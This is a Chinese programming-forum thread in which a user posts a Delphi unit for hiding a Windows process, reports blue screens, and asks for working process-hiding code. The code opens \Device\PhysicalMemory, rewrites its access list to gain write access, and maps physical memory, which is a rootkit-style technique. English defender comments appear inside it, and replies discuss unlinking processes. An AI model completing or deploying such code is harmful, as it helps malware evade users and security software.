这是一个隐藏进程的代码,做成单元引用时,有时蓝屏!
哪位帮看一下
或者哪位有收藏且试用过没问题的隐藏进程代码,请发一下?
      unit HideProcess;

// Review notes (defensive reading of the visible part of this unit):
// - The routines visible here obtain a writable mapping of the
//   \Device\PhysicalMemory section via ntdll's ZwOpenSection, rewriting the
//   section's DACL when the first open is refused. MyHideProcess itself is
//   declared below but implemented outside the visible lines, so how the
//   mapping is used for "hiding" is not established here.
// - Opening \Device\PhysicalMemory from user mode needs the right to open
//   that section (in practice administrative rights) and is refused by later
//   Windows releases; the replies on this page report success on XP only.
// - For defenders: a user-mode process opening \Device\PhysicalMemory with
//   write access, or changing its DACL, is an unusual and monitorable event.

interface

function MyHideProcess: Boolean;

implementation

uses
  Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;

type
  // Native API status code; a negative value means failure (see NT_SUCCESS).
  NTSTATUS = LongInt;

const
  //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
  STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004); // not referenced in the visible code
  STATUS_ACCESS_DENIED = NTSTATUS($C0000022);        // triggers the DACL rewrite in OpenPhysicalMemory
  // OBJECT_ATTRIBUTES.Attributes flag values; the visible code passes 0.
  OBJ_INHERIT = $00000002;
  OBJ_PERMANENT = $00000010;
  OBJ_EXCLUSIVE = $00000020;
  OBJ_CASE_INSENSITIVE = $00000040;
  OBJ_OPENIF = $00000080;
  OBJ_OPENLINK = $00000100;
  OBJ_KERNEL_HANDLE = $00000200;
  OBJ_VALID_ATTRIBUTES = $000003F2;

type
  PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
  // Not referenced in the visible code.
  IO_STATUS_BLOCK = record
    Status: NTSTATUS;
    FObject: DWORD;
  end;

  PUNICODE_STRING = ^UNICODE_STRING;
  // Counted wide-character string as passed to the native API; filled by
  // RtlInitUnicodeString in OpenPhysicalMemory.
  UNICODE_STRING = record
    Length: Word;
    MaximumLength: Word;
    Buffer: PWideChar;
  end;

  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
  // Object name and open attributes handed to ZwOpenSection.
  OBJECT_ATTRIBUTES = record
    Length: DWORD;
    RootDirectory: Pointer;
    ObjectName: PUNICODE_STRING;
    Attributes: DWORD;
    SecurityDescriptor: Pointer;
    SecurityQualityOfService: Pointer;
  end;

  // Signatures of the two ntdll exports resolved at run time by InitNTDLL.
  TZwOpenSection = function(SectionHandle: PHandle;
    DesiredAccess: ACCESS_MASK;
    ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
  TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
    SourceString: PWideChar); stdcall;

var
  // Set by InitNTDLL; CloseNTDLL frees the module but leaves these pointers as they are.
  RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
  ZwOpenSection: TZwOpenSection = nil;
  g_hNtDLL: THandle = 0;               // ntdll module handle from LoadLibrary
  g_pMapPhysicalMemory: Pointer = nil; // view returned by MapViewOfFile in OpenPhysicalMemory
  g_hMPM: THandle = 0;                 // handle to the \Device\PhysicalMemory section
  g_hMPM2: THandle = 0;                // not referenced in the visible code
  g_osvi: OSVERSIONINFO;               // filled by GetVersionEx in OpenPhysicalMemory
  b_hide: Boolean = false;             // not referenced in the visible code
//---------------------------------------------------------------------------
// Loads ntdll.dll and resolves RtlInitUnicodeString and ZwOpenSection into the
// unit-level procedure variables. Returns False only when LoadLibrary fails;
// the two GetProcAddress results are stored without a nil check, so a failed
// lookup would surface later as a call through a nil pointer rather than here.
function InitNTDLL: Boolean;
begin
  g_hNtDLL := LoadLibrary('ntdll.dll');
  if 0 = g_hNtDLL then
  begin
    Result := false;
    Exit;
  end;
  RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
  ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');
  Result := True;
end;
//---------------------------------------------------------------------------
// Releases the ntdll module handle taken by InitNTDLL and resets it to 0.
// The resolved procedure pointers (RtlInitUnicodeString, ZwOpenSection) are
// not cleared, so they dangle after this call.
procedure CloseNTDLL;
begin
  if (0 <> g_hNtDLL) then
    FreeLibrary(g_hNtDLL);
  g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------
// Rewrites the DACL of hSection so that the special trustee "CURRENT_USER" is
// granted SECTION_MAP_WRITE. Called from OpenPhysicalMemory after the first
// ZwOpenSection returns STATUS_ACCESS_DENIED, on a handle reopened with
// READ_CONTROL or WRITE_DAC. The procedure reports no result: each error
// branch below releases the buffers and then falls through to the next call
// instead of exiting, so SetEntriesInAcl / SetSecurityInfo may run with nil
// pDacl / pNewDacl. On the success path neither pSD nor pNewDacl is released.
// Defender note: a DACL change on \Device\PhysicalMemory is a rare event and
// a useful object-access auditing / EDR signal.
procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
  pDacl: PACL;
  pSD: PPSECURITY_DESCRIPTOR;
  pNewDacl: PACL;
  dwRes: DWORD;
  ea: EXPLICIT_ACCESS;
begin
  pDacl := nil;
  pSD := nil;
  pNewDacl := nil;
  // Read the current DACL of the section object.
  // NOTE(review): pSD is a pointer-to-pointer initialised to nil and is
  // dereferenced (pSD^) in the cleanup branches below; confirm against the
  // AclAPI declaration in use that GetSecurityInfo actually stores a
  // descriptor through this argument.
  dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);
  if ERROR_SUCCESS <> dwRes then
  begin
    // Cleanup only; execution continues below.
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;
  // One explicit ACE: grant SECTION_MAP_WRITE, no inheritance, to the
  // "CURRENT_USER" trustee name.
  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
  ea.grfAccessPermissions := SECTION_MAP_WRITE;
  ea.grfAccessMode := GRANT_ACCESS;
  ea.grfInheritance := NO_INHERITANCE;
  ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
  ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
  ea.Trustee.ptstrName := 'CURRENT_USER';
  // Merge the new ACE with the existing DACL into pNewDacl.
  dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);
  if ERROR_SUCCESS <> dwRes then
  begin
    // Cleanup only; execution continues below.
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;
  // Apply the merged DACL to the section object.
  dwRes := SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);
  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;
end;
//---------------------------------------------------------------------------
// Opens the \Device\PhysicalMemory section for read/write and maps one page
// ($1000 bytes) of it, at a version-specific physical offset, into
// g_pMapPhysicalMemory. Returns the section handle (also kept in g_hMPM), or
// 0 when the OS version is not 5.0/5.1, the open fails, or the mapping fails.
// Relies on InitNTDLL having resolved RtlInitUnicodeString and ZwOpenSection;
// neither pointer is checked here.
function OpenPhysicalMemory: THandle;
var
  status: NTSTATUS;
  physmemString: UNICODE_STRING;
  attributes: OBJECT_ATTRIBUTES;
  PhyDirectory: DWORD;
begin
  g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
  GetVersionEx(g_osvi);
  // Only major version 5, minor 0 or 1, is accepted; everything else takes the
  // early exit, which is consistent with the replies on this page reporting no
  // effect on 2003 / Vista.
  if (5 <> g_osvi.dwMajorVersion) then
  begin
    Result := 0;
    Exit;
  end;
  // Hard-coded physical offset per minor version. By its name presumably a
  // paging-structure address, but the visible code does not establish what
  // lives there; the page mapped below is whatever this offset addresses.
  case g_osvi.dwMinorVersion of
    0: PhyDirectory := $30000;
    1: PhyDirectory := $39000;
  else
    begin
      Result := 0;
      Exit;
    end;
  end;
  RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');
  attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
  attributes.RootDirectory := nil;
  attributes.ObjectName := @physmemString;
  attributes.Attributes := 0;
  attributes.SecurityDescriptor := nil;
  attributes.SecurityQualityOfService := nil;
  status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  if (status = STATUS_ACCESS_DENIED) then
  begin
    // First open refused: reopen with rights to read/change the DACL, grant
    // CURRENT_USER write access, close, then retry. The result of this
    // second ZwOpenSection is not checked before the handle is used.
    ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);
    status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  end;
  // NT_SUCCESS: a non-negative status is success (see the NT_SUCCESS note above).
  if not (LongInt(status) >= 0) then
  begin
    Result := 0;
    Exit;
  end;
  // Map a single page at PhyDirectory with read/write access.
  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
    FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);
  if (g_pMapPhysicalMemory = nil) then
  begin
    // g_hMPM stays open on this path; it is not closed before returning 0.
    Result := 0;
    Exit;
  end;
  Result := g_hMPM;
end;
//---------------------------------------------------------------------------

解决方案 »

  1.   

    加一个 
    Refresh; 
    进去
      

  2.   

    APL方法(移除链接点)可能会导致某些意外而BSOD。
    一般都是安全的,只是偶尔会出问题。
      

  3.   

    这个单元我也试过,在xp下有效,在2003,Vista下没用。
    而且正如楼主说的,会蓝屏(我分析是和瑞星有冲突)。
      

  4.   

    你的思路我没有细看,但我有自己的方法可以实现!
    只不过是用C++实现的(我以前写的),我还没有花时间改成Delphi的。
      

  5.   

    这个帖子我一次发了三个,是不小心发的。所以这个帖子的分加到别的帖子去了。
    http://topic.csdn.net/u/20081026/08/25b85c66-a560-45df-a32e-544df8169da6.html 
    上面是地址,如果有人能解决的话,三个帖子一共300分.